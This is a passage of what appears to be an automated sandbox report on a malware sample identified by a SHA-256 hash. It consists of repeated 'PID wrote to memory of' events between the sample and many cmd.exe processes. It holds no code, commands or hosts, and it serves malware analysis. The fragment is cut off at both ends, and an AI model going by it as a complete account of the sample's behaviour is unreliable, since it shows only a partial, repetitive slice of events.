cmd.exe 233 PID 672 wrote to memory of 1128 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 234 PID 672 wrote to memory of 1128 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 234 PID 672 wrote to memory of 1128 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 234 PID 672 wrote to memory of 1128 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 234 PID 1128 wrote to memory of 1224 1128 cmd.exe 236 PID 1128 wrote to memory of 1224 1128 cmd.exe 236 PID 1128 wrote to memory of 1224 1128 cmd.exe 236 PID 1128 wrote to memory of 1224 1128 cmd.exe 236 PID 1128 wrote to memory of 744 1128 cmd.exe 237 PID 1128 wrote to memory of 744 1128 cmd.exe 237 PID 1128 wrote to memory of 744 1128 cmd.exe 237 PID 1128 wrote to memory of 744 1128 cmd.exe 237 PID 1128 wrote to memory of 1384 1128 cmd.exe 238 PID 1128 wrote to memory of 1384 1128 cmd.exe 238 PID 1128 wrote to memory of 1384 1128 cmd.exe 238 PID 1128 wrote to memory of 1384 1128 cmd.exe 238 PID 1384 wrote to memory of 1896 1384 cmd.exe 239 PID 1384 wrote to memory of 1896 1384 cmd.exe 239 PID 1384 wrote to memory of 1896 1384 cmd.exe 239 PID 1384 wrote to memory of 1896 1384 cmd.exe 239 PID 1128 wrote to memory of 224 1128 cmd.exe 240 PID 1128 wrote to memory of 224 1128 cmd.exe 240 PID 1128 wrote to memory of 224 1128 cmd.exe 240 PID 1128 wrote to memory of 224 1128 cmd.exe 240 PID 672 wrote to memory of 896 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 241 PID 672 wrote to memory of 896 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 241 PID 672 wrote to memory of 896 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 241 PID 672 wrote to memory of 896 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 241 PID 896 wrote to memory of 700 896 cmd.exe 243 PID 896 wrote to memory of 700 896 cmd.exe 243 PID 896 wrote to memory of 700 896 cmd.exe 243 PID 896 wrote to memory of 700 896 cmd.exe 243 PID 896 wrote to memory of 232 896 cmd.exe 244 PID 896 wrote to memory of 232 896 cmd.exe 244 PID 896 wrote to memory of 232 896 cmd.exe 244 PID 896 wrote to memory of 232 896 cmd.exe 244 PID 896 wrote to memory of 980 896 cmd.exe 245 PID 896 wrote to memory of 980 896 cmd.exe 245 PID 896 wrote to memory of 980 896 cmd.exe 245 PID 896 wrote to memory of 980 896 cmd.exe 245 PID 980 wrote to memory of 220 980 cmd.exe 246 PID 980 wrote to memory of 220 980 cmd.exe 246 PID 980 wrote to memory of 220 980 cmd.exe 246 PID 980 wrote to memory of 220 980 cmd.exe 246 PID 896 wrote to memory of 216 896 cmd.exe 247 PID 896 wrote to memory of 216 896 cmd.exe 247 PID 896 wrote to memory of 216 896 cmd.exe 247 PID 896 wrote to memory of 216 896 cmd.exe 247 PID 672 wrote to memory of 1928 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 248 PID 672 wrote to memory of 1928 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 248 PID 672 wrote to memory of 1928 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 248 PID 672 wrote to memory of 1928 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 248 PID 1928 wrote to memory of 676 1928 cmd.exe 250 PID 1928 wrote to memory of 676 1928 cmd.exe 250 PID 1928 wrote to memory of 676 1928 cmd.exe 250 PID 1928 wrote to memory of 676 1928 cmd.exe 250 PID 1928 wrote to memory of 1680 1928 cmd.exe 251 PID 1928 wrote to memory of 1680 1928 cmd.exe 251 PID 1928 wrote to memory of 1680 1928 cmd.exe 251 PID 1928 wrote to memory of 1680 1928 cmd.exe 251 PID 1928 wrote to memory of 992 1928 cmd.exe 252 PID 1928 wrote to memory of 992 1928 cmd.exe 252 PID 1928 wrote to memory of 992 1928 cmd.exe 252 PID 1928 wrote to memory of 992 1928 cmd.exe 252 PID 992 wrote to memory of 756 992 cmd.exe 253 PID 992 wrote to memory of 756 992 cmd.exe 253 PID 992 wrote to memory of 756 992 cmd.exe 253 PID 992 wrote to memory of 756 992 cmd.exe 253 PID 1928 wrote to memory of 1896 1928 cmd.exe 254 PID 1928 wrote to memory of 1896 1928 cmd.exe 254 PID 1928 wrote to memory of 1896 1928 cmd.exe 254 PID 1928 wrote to memory of 1896 1928 cmd.exe 254 PID 672 wrote to memory of 1820 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 255 PID 672 wrote to memory of 1820 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 255 PID 672 wrote to memory of 1820 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 255 PID 672 wrote to memory of 1820 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 255 PID 1820 wrote to memory of 1736 1820 cmd.exe 257 PID 1820 wrote to memory of 1736 1820 cmd.exe 257 PID 1820 wrote to memory of 1736 1820 cmd.exe 257 PID 1820 wrote to memory of 1736 1820 cmd.exe 257 PID 1820 wrote to memory of 524 1820 cmd.exe 258 PID 1820 wrote to memory of 524 1820 cmd.exe 258 PID 1820 wrote to memory of 524 1820 cmd.exe 258 PID 1820 wrote to memory of 524 1820 cmd.exe 258 PID 1820 wrote to memory of 760 1820 cmd.exe 259 PID 1820 wrote to memory of 760 1820 cmd.exe 259 PID 1820 wrote to memory of 760 1820 cmd.exe 259 PID 1820 wrote to memory of 760 1820 cmd.exe 259 PID 760 wrote to memory of 1572 760 cmd.exe 260 PID 760 wrote to memory of 1572 760 cmd.exe 260 PID 760 wrote to memory of 1572 760 cmd.exe 260 PID 760 wrote to memory of 1572 760 cmd.exe 260 PID 1820 wrote to memory of 1220 1820 cmd.exe 261 PID 1820 wrote to memory of 1220 1820 cmd.exe 261 PID 1820 wrote to memory of 1220 1820 cmd.exe 261 PID 1820 wrote to memory of 1220 1820 cmd.exe 261 PID 672 wrote to memory of 216 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 262 PID 672 wrote to memory of 216 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 262 PID 672 wrote to memory of 216 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 262 PID 672 wrote to memory of 216 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 262 PID 216 wrote to memory of 1064 216 cmd.exe 264 PID 216 wrote to memory of 1064 216 cmd.exe 264 PID 216 wrote to memory of 1064 216 cmd.exe 264 PID 216 wrote to memory of 1064 216 cmd.exe 264 PID 216 wrote to memory of 676 216 cmd.exe 265 PID 216 wrote to memory of 676 216 cmd.exe 265 PID 216 wrote to memory of 676 216 cmd.exe 265 PID 216 wrote to memory of 676 216 cmd.exe 265 PID 216 wrote to memory of 1680 216 cmd.exe 266 PID 216 wrote to memory of 1680 216 cmd.exe 266 PID 216 wrote to memory of 1680 216 cmd.exe 266 PID 216 wrote to memory of 1680 216 cmd.exe 266 PID 1680 wrote to memory of 1652 1680 cmd.exe 267 PID 1680 wrote to memory of 1652 1680 cmd.exe 267 PID 1680 wrote to memory of 1652 1680 cmd.exe 267 PID 1680 wrote to memory of 1652 1680 cmd.exe 267 PID 216 wrote to memory of 436 216 cmd.exe 268 PID 216 wrote to memory of 436 216 cmd.exe 268 PID 216 wrote to memory of 436 216 cmd.exe 268 PID 216 wrote to memory of 436 216 cmd.exe 268 PID 672 wrote to memory of 652 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 269 PID 672 wrote to memory of 652 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 269 PID 672 wrote to memory of 652 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 269 PID 672 wrote to memory of 652 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 269 PID 652 wrote to memory of 212 652 cmd.exe 271 PID 652 wrote to memory of 212 652 cmd.exe 271 PID 652 wrote to memory of 212 652 cmd.exe 271 PID 652 wrote to memory of 212 652 cmd.exe 271 PID 652 wrote to memory of 1812 652 cmd.exe 272 PID 652 wrote to memory of 1812 652 cmd.exe 272 PID 652 wrote to memory of 1812 652 cmd.exe 272 PID 652 wrote to memory of 1812 652 cmd.exe 272 PID 652 wrote to memory of 700 652 cmd.exe 273 PID 652 wrote to memory of 700 652 cmd.exe 273 PID 652 wrote to memory of 700 652 cmd.exe 273 PID 652 wrote to memory of 700 652 cmd.exe 273 PID 700 wrote to memory of 232 700 cmd.exe 274 PID 700 wrote to memory of 232 700 cmd.exe 274 PID 700 wrote to memory of 232 700 cmd.exe 274 PID 700 wrote to memory of 232 700 cmd.exe 274 PID 652 wrote to memory of 1572 652 cmd.exe 275 PID 652 wrote to memory of 1572 652 cmd.exe 275 PID 652 wrote to memory of 1572 652 cmd.exe 275 PID 652 wrote to memory of 1572 652 cmd.exe 275 PID 672 wrote to memory of 220 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 276 PID 672 wrote to memory of 220 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 276 PID 672 wrote to memory of 220 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 276 PID 672 wrote to memory of 220 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 276 PID 220 wrote to memory of 1488 220 cmd.exe 278 PID 220 wrote to memory of 1488 220 cmd.exe 278 PID 220 wrote to memory of 1488 220 cmd.exe 278 PID 220 wrote to memory of 1488 220 cmd.exe 278 PID 220 wrote to memory of 984 220 cmd.exe 279 PID 220 wrote to memory of 984 220 cmd.exe 279 PID 220 wrote to memory of 984 220 cmd.exe 279 PID 220 wrote to memory of 984 220 cmd.exe 279 PID 220 wrote to memory of 280 220 cmd.exe 280 PID 220 wrote to memory of 280 220 cmd.exe 280 PID 220 wrote to memory of 280 220 cmd.exe 280 PID 220 wrote to memory of 280 220 cmd.exe 280 PID 280 wrote to memory of 1968 280 cmd.exe 281 PID 280 wrote to memory of 1968 280 cmd.exe 281 PID 280 wrote to memory of 1968 280 cmd.exe 281 PID 280 wrote to memory of 1968 280 cmd.exe 281 PID 220 wrote to memory of 1064 220 cmd.exe 282 PID 220 wrote to memory of 1064 220 cmd.exe 282 PID 220 wrote to memory of 1064 220 cmd.exe 282 PID 220 wrote to memory of 1064 220 cmd.exe 282 PID 672 wrote to memory of 1576 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 283 PID 672 wrote to memory of 1576 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 283 PID 672 wrote to memory of 1576 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 283 PID 672 wrote to memory of 1576 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 283 PID 1576 wrote to memory of 1680 1576 cmd.exe 285 PID 1576 wrote to memory of 1680 1576 cmd.exe 285 PID 1576 wrote to memory of 1680 1576 cmd.exe 285 PID 1576 wrote to memory of 1680 1576 cmd.exe 285 PID 1576 wrote to memory of 756 1576 cmd.exe 286 PID 1576 wrote to memory of 756 1576 cmd.exe 286 PID 1576 wrote to memory of 756 1576 cmd.exe 286 PID 1576 wrote to memory of 756 1576 cmd.exe 286 PID 1576 wrote to memory of 896 1576 cmd.exe 287 PID 1576 wrote to memory of 896 1576 cmd.exe 287 PID 1576 wrote to memory of 896 1576 cmd.exe 287 PID 1576 wrote to memory of 896 1576 cmd.exe 287 PID 896 wrote to memory of 1848 896 cmd.exe 288 PID 896 wrote to memory of 1848 896 cmd.exe 288 PID 896 wrote to memory of 1848 896 cmd.exe 288 PID 896 wrote to memory of 1848 896 cmd.exe 288 PID 1576 wrote to memory of 212 1576 cmd.exe 289 PID 1576 wrote to memory of 212 1576 cmd.exe 289 PID 1576 wrote to memory of 212 1576 cmd.exe 289 PID 1576 wrote to memory of 212 1576 cmd.exe 289 PID 672 wrote to memory of 524 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 290 PID 672 wrote to memory of 524 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 290 PID 672 wrote to memory of 524 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 290 PID 672 wrote to memory of 524 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 290 PID 524 wrote to memory of 700 524 cmd.exe 292 PID 524 wrote to memory of 700 524 cmd.exe 292 PID 524 wrote to memory of 700 524 cmd.exe 292 PID 524 wrote to memory of 700 524 cmd.exe 292 PID 524 wrote to memory of 1572 524 cmd.exe 293 PID 524 wrote to memory of 1572 524 cmd.exe 293 PID 524 wrote to memory of 1572 524 cmd.exe 293 PID 524 wrote to memory of 1572 524 cmd.exe 293 PID 524 wrote to memory of 652 524 cmd.exe 294 PID 524 wrote to memory of 652 524 cmd.exe 294 PID 524 wrote to memory of 652 524 cmd.exe 294 PID 524 wrote to memory of 652 524 cmd.exe 294 PID 652 wrote to memory of 1372 652 cmd.exe 295 PID 652 wrote to memory of 1372 652 cmd.exe 295 PID 652 wrote to memory of 1372 652 cmd.exe 295 PID 652 wrote to memory of 1372 652 cmd.exe 295 PID 524 wrote to memory of 908 524 cmd.exe 296 PID 524 wrote to memory of 908 524 cmd.exe 296 PID 524 wrote to memory of 908 524 cmd.exe 296 PID 524 wrote to memory of 908 524 cmd.exe 296 PID 672 wrote to memory of 984 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 297 PID 672 wrote to memory of 984 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 297 PID 672 wrote to memory of 984 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 297 PID 672 wrote to memory of 984 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 297 PID 984 wrote to memory of 952 984 cmd.exe 299 PID 984 wrote to memory of 952 984 cmd.exe 299 PID 984 wrote to memory of 952 984 cmd.exe 299 PID 984 wrote to memory of 952 984 cmd.exe 299 PID 984 wrote to memory of 676 984 cmd.exe 300 PID 984 wrote to memory of 676 984 cmd.exe 300 PID 984 wrote to memory of 676 984 cmd.exe 300 PID 984 wrote to memory of 676 984 cmd.exe 300 PID 984 wrote to memory of 1128 984 cmd.exe 301 PID 984 wrote to memory of 1128 984 cmd.exe 301 PID 984 wrote to memory of 1128 984 cmd.exe 301 PID 984 wrote to memory of 1128 984 cmd.exe 301 PID 1128 wrote to memory of 1220 1128 cmd.exe 302 PID 1128 wrote to memory of 1220 1128 cmd.exe 302 PID 1128 wrote to memory of 1220 1128 cmd.exe 302 PID 1128 wrote to memory of 1220 1128 cmd.exe 302 PID 984 wrote to memory of 992 984 cmd.exe 303 PID 984 wrote to memory of 992 984 cmd.exe 303 PID 984 wrote to memory of 992 984 cmd.exe 303 PID 984 wrote to memory of 992 984 cmd.exe 303 PID 672 wrote to memory of 436 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 304 PID 672 wrote to memory of 436 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 304 PID 672 wrote to memory of 436 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 304 PID 672 wrote to memory of 436 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 304 PID 436 wrote to memory of 1848 436 cmd.exe 306 PID 436 wrote to memory of 1848 436 cmd.exe 306 PID 436 wrote to memory of 1848 436 cmd.exe 306 PID 436 wrote to memory of 1848 436 cmd.exe 306 PID 436 wrote to memory of 204 436 cmd.exe 307 PID 436 wrote to memory of 204 436 cmd.exe 307 PID 436 wrote to memory of 204 436 cmd.exe 307 PID 436 wrote to memory of 204 436 cmd.exe 307 PID 436 wrote to memory of 212 436 cmd.exe 308 PID 436 wrote to memory of 212 436 cmd.exe 308 PID 436 wrote to memory of 212 436 cmd.exe 308 PID 436 wrote to memory of 212 436 cmd.exe 308 PID 212 wrote to memory of 1576 212 cmd.exe 309 PID 212 wrote to memory of 1576 212 cmd.exe 309 PID 212 wrote to memory of 1576 212 cmd.exe 309 PID 212 wrote to memory of 1576 212 cmd.exe 309 PID 436 wrote to memory of 980 436 cmd.exe 310 PID 436 wrote to memory of 980 436 cmd.exe 310 PID 436 wrote to memory of 980 436 cmd.exe 310 PID 436 wrote to memory of 980 436 cmd.exe 310 PID 672 wrote to memory of 320 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 311 PID 672 wrote to memory of 320 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 311 PID 672 wrote to memory of 320 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 311 PID 672 wrote to memory of 320 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 311 PID 320 wrote to memory of 1372 320 cmd.exe 313 PID 320 wrote to memory of 1372 320 cmd.exe 313 PID 320 wrote to memory of 1372 320 cmd.exe 313 PID 320 wrote to memory of 1372 320 cmd.exe 313 PID 320 wrote to memory of 1520 320 cmd.exe 314 PID 320 wrote to memory of 1520 320 cmd.exe 314 PID 320 wrote to memory of 1520 320 cmd.exe 314 PID 320 wrote to memory of 1520 320 cmd.exe 314 PID 320 wrote to memory of 908 320 cmd.exe 315 PID 320 wrote to memory of 908 320 cmd.exe 315 PID 320 wrote to memory of 908 320 cmd.exe 315 PID 320 wrote to memory of 908 320 cmd.exe 315 PID 908 wrote to memory of 524 908 cmd.exe 316 PID 908 wrote to memory of 524 908 cmd.exe 316 PID 908 wrote to memory of 524 908 cmd.exe 316 PID 908 wrote to memory of 524 908 cmd.exe 316 PID 320 wrote to memory of 1920 320 cmd.exe 317 PID 320 wrote to memory of 1920 320 cmd.exe 317 PID 320 wrote to memory of 1920 320 cmd.exe 317 PID 320 wrote to memory of 1920 320 cmd.exe 317 PID 672 wrote to memory of 1224 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 318 PID 672 wrote to memory of 1224 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 318 PID 672 wrote to memory of 1224 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 318 PID 672 wrote to memory of 1224 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 318 PID 1224 wrote to memory of 1220 1224 cmd.exe 320 PID 1224 wrote to memory of 1220 1224 cmd.exe 320 PID 1224 wrote to memory of 1220 1224 cmd.exe 320 PID 1224 wrote to memory of 1220 1224 cmd.exe 320 PID 1224 wrote to memory of 1960 1224 cmd.exe 321 PID 1224 wrote to memory of 1960 1224 cmd.exe 321 PID 1224 wrote to memory of 1960 1224 cmd.exe 321 PID 1224 wrote to memory of 1960 1224 cmd.exe 321 PID 1224 wrote to memory of 992 1224 cmd.exe 322 PID 1224 wrote to memory of 992 1224 cmd.exe 322 PID 1224 wrote to memory of 992 1224 cmd.exe 322 PID 1224 wrote to memory of 992 1224 cmd.exe 322 PID 992 wrote to memory of 984 992 cmd.exe 323 PID 992 wrote to memory of 984 992 cmd.exe 323 PID 992 wrote to memory of 984 992 cmd.exe 323 PID 992 wrote to memory of 984 992 cmd.exe 323 PID 1224 wrote to memory of 896 1224 cmd.exe 324 PID 1224 wrote to memory of 896 1224 cmd.exe 324 PID 1224 wrote to memory of 896 1224 cmd.exe 324 PID 1224 wrote to memory of 896 1224 cmd.exe 324 PID 672 wrote to memory of 1812 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 325 PID 672 wrote to memory of 1812 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 325 PID 672 wrote to memory of 1812 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 325 PID 672 wrote to memory of 1812 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 325 PID 1812 wrote to memory of 1576 1812 cmd.exe 327 PID 1812 wrote to memory of 1576 1812 cmd.exe 327 PID 1812 wrote to memory of 1576 1812 cmd.exe 327 PID 1812 wrote to memory of 1576 1812 cmd.exe 327 PID 1812 wrote to memory of 700 1812 cmd.exe 328 PID 1812 wrote to memory of 700 1812 cmd.exe 328 PID 1812 wrote to memory of 700 1812 cmd.exe 328 PID 1812 wrote to memory of 700 1812 cmd.exe 328 PID 1812 wrote to memory of 980 1812 cmd.exe 329 PID 1812 wrote to memory of 980 1812 cmd.exe 329 PID 1812 wrote to memory of 980 1812 cmd.exe 329 PID 1812 wrote to memory of 980 1812 cmd.exe 329 PID 980 wrote to memory of 436 980 cmd.exe 330 PID 980 wrote to memory of 436 980 cmd.exe 330 PID 980 wrote to memory of 436 980 cmd.exe 330 PID 980 wrote to memory of 436 980 cmd.exe 330 PID 1812 wrote to memory of 652 1812 cmd.exe 331 PID 1812 wrote to memory of 652 1812 cmd.exe 331 PID 1812 wrote to memory of 652 1812 cmd.exe 331 PID 1812 wrote to memory of 652 1812 cmd.exe 331 PID 672 wrote to memory of 1216 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 332 PID 672 wrote to memory of 1216 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 332 PID 672 wrote to memory of 1216 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 332 PID 672 wrote to memory of 1216 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 332 PID 1216 wrote to memory of 524 1216 cmd.exe 334 PID 1216 wrote to memory of 524 1216 cmd.exe 334 PID 1216 wrote to memory of 524 1216 cmd.exe 334 PID 1216 wrote to memory of 524 1216 cmd.exe 334 PID 1216 wrote to memory of 280 1216 cmd.exe 335 PID 1216 wrote to memory of 280 1216 cmd.exe 335 PID 1216 wrote to memory of 280 1216 cmd.exe 335 PID 1216 wrote to memory of 280 1216 cmd.exe 335 PID 1216 wrote to memory of 1752 1216 cmd.exe 336 PID 1216 wrote to memory of 1752 1216 cmd.exe 336 PID 1216 wrote to memory of 1752 1216 cmd.exe 336 PID 1216 wrote to memory of 1752 1216 cmd.exe 336 PID 1752 wrote to memory of 1064 1752 cmd.exe 337 PID 1752 wrote to memory of 1064 1752 cmd.exe 337 PID 1752 wrote to memory of 1064 1752 cmd.exe 337 PID 1752 wrote to memory of 1064 1752 cmd.exe 337 PID 1216 wrote to memory of 1128 1216 cmd.exe 338 PID 1216 wrote to memory of 1128 1216 cmd.exe 338 PID 1216 wrote to memory of 1128 1216 cmd.exe 338 PID 1216 wrote to memory of 1128 1216 cmd.exe 338 PID 672 wrote to memory of 1220 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 339 PID 672 wrote to memory of 1220 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 339 PID 672 wrote to memory of 1220 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 339 PID 672 wrote to memory of 1220 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 339 PID 1220 wrote to memory of 1928 1220 cmd.exe 341 PID 1220 wrote to memory of 1928 1220 cmd.exe 341 PID 1220 wrote to memory of 1928 1220 cmd.exe 341 PID 1220 wrote to memory of 1928 1220 cmd.exe 341 PID 1220 wrote to memory of 992 1220 cmd.exe 342 PID 1220 wrote to memory of 992 1220 cmd.exe 342 PID 1220 wrote to memory of 992 1220 cmd.exe 342 PID 1220 wrote to memory of 992 1220 cmd.exe 342 PID 1220 wrote to memory of 544 1220 cmd.exe 343 PID 1220 wrote to memory of 544 1220 cmd.exe 343 PID 1220 wrote to memory of 544 1220 cmd.exe 343 PID 1220 wrote to memory of 544 1220 cmd.exe 343 PID 544 wrote to memory of 220 544 cmd.exe 344 PID 544 wrote to memory of 220 544 cmd.exe 344 PID 544 wrote to memory of 220 544 cmd.exe 344 PID 544 wrote to memory of 220 544 cmd.exe 344 PID 1220 wrote to memory of 744 1220 cmd.exe 345 PID 1220 wrote to memory of 744 1220 cmd.exe 345 PID 1220 wrote to memory of 744 1220 cmd.exe 345 PID 1220 wrote to memory of 744 1220 cmd.exe 345 PID 672 wrote to memory of 1576 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 346 PID 672 wrote to memory of 1576 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 346 PID 672 wrote to memory of 1576 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 346 PID 672 wrote to memory of 1576 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 346 PID 1576 wrote to memory of 364 1576 cmd.exe 348 PID 1576 wrote to memory of 364 1576 cmd.exe 348 PID 1576 wrote to memory of 364 1576 cmd.exe 348 PID 1576 wrote to memory of 364 1576 cmd.exe 348 PID 1576 wrote to memory of 980 1576 cmd.exe 349 PID 1576 wrote to memory of 980 1576 cmd.exe 349 PID 1576 wrote to memory of 980 1576 cmd.exe 349 PID 1576 wrote to memory of 980 1576 cmd.exe 349 PID 1576 wrote to memory of 964 1576 cmd.exe 350 PID 1576 wrote to memory of 964 1576 cmd.exe 350 PID 1576 wrote to memory of 964 1576 cmd.exe 350 PID 1576 wrote to memory of 964 1576 cmd.exe 350 PID 964 wrote to memory of 204 964 cmd.exe 351 PID 964 wrote to memory of 204 964 cmd.exe 351 PID 964 wrote to memory of 204 964 cmd.exe 351 PID 964 wrote to memory of 204 964 cmd.exe 351 PID 1576 wrote to memory of 1644 1576 cmd.exe 352 PID 1576 wrote to memory of 1644 1576 cmd.exe 352 PID 1576 wrote to memory of 1644 1576 cmd.exe 352 PID 1576 wrote to memory of 1644 1576 cmd.exe 352 PID 672 wrote to memory of 524 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 353 PID 672 wrote to memory of 524 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 353 PID 672 wrote to memory of 524 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 353 PID 672 wrote to memory of 524 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 353 PID 524 wrote to memory of 236 524 cmd.exe 355 PID 524 wrote to memory of 236 524 cmd.exe 355 PID 524 wrote to memory of 236 524 cmd.exe 355 PID 524 wrote to memory of 236 524 cmd.exe 355 PID 524 wrote to memory of 1752 524 cmd.exe 356 PID 524 wrote to memory of 1752 524 cmd.exe 356 PID 524 wrote to memory of 1752 524 cmd.exe 356 PID 524 wrote to memory of 1752 524 cmd.exe 356 PID 524 wrote to memory of 232 524 cmd.exe 357 PID 524 wrote to memory of 232 524 cmd.exe 357 PID 524 wrote to memory of 232 524 cmd.exe 357 PID 524 wrote to memory of 232 524 cmd.exe 357 PID 232 wrote to memory of 1828 232 cmd.exe 358 PID 232 wrote to memory of 1828 232 cmd.exe 358 PID 232 wrote to memory of 1828 232 cmd.exe 358 PID 232 wrote to memory of 1828 232 cmd.exe 358 PID 524 wrote to memory of 1068 524 cmd.exe 359 PID 524 wrote to memory of 1068 524 cmd.exe 359 PID 524 wrote to memory of 1068 524 cmd.exe 359 PID 524 wrote to memory of 1068 524 cmd.exe 359 PID 672 wrote to memory of 992 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 360 PID 672 wrote to memory of 992 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 360 PID 672 wrote to memory of 992 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 360 PID 672 wrote to memory of 992 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 360 PID 992 wrote to memory of 1736 992 cmd.exe 362 PID 992 wrote to memory of 1736 992 cmd.exe 362 PID 992 wrote to memory of 1736 992 cmd.exe 362 PID 992 wrote to memory of 1736 992 cmd.exe 362 PID 992 wrote to memory of 1956 992 cmd.exe 363 PID 992 wrote to memory of 1956 992 cmd.exe 363 PID 992 wrote to memory of 1956 992 cmd.exe 363 PID 992 wrote to memory of 1956 992 cmd.exe 363 PID 992 wrote to memory of 1384 992 cmd.exe 364 PID 992 wrote to memory of 1384 992 cmd.exe 364 PID 992 wrote to memory of 1384 992 cmd.exe 364 PID 992 wrote to memory of 1384 992 cmd.exe 364 PID 1384 wrote to memory of 216 1384 cmd.exe 365 PID 1384 wrote to memory of 216 1384 cmd.exe 365 PID 1384 wrote to memory of 216 1384 cmd.exe 365 PID 1384 wrote to memory of 216 1384 cmd.exe 365 PID 992 wrote to memory of 1512 992 cmd.exe 366 PID 992 wrote to memory of 1512 992 cmd.exe 366 PID 992 wrote to memory of 1512 992 cmd.exe 366 PID 992 wrote to memory of 1512 992 cmd.exe 366 PID 672 wrote to memory of 980 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 367 PID 672 wrote to memory of 980 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 367 PID 672 wrote to memory of 980 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 367 PID 672 wrote to memory of 980 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 367 PID 980 wrote to memory of 964 980 cmd.exe 369 PID 980 wrote to memory of 964 980 cmd.exe 369 PID 980 wrote to memory of 964 980 cmd.exe 369 PID 980 wrote to memory of 964 980 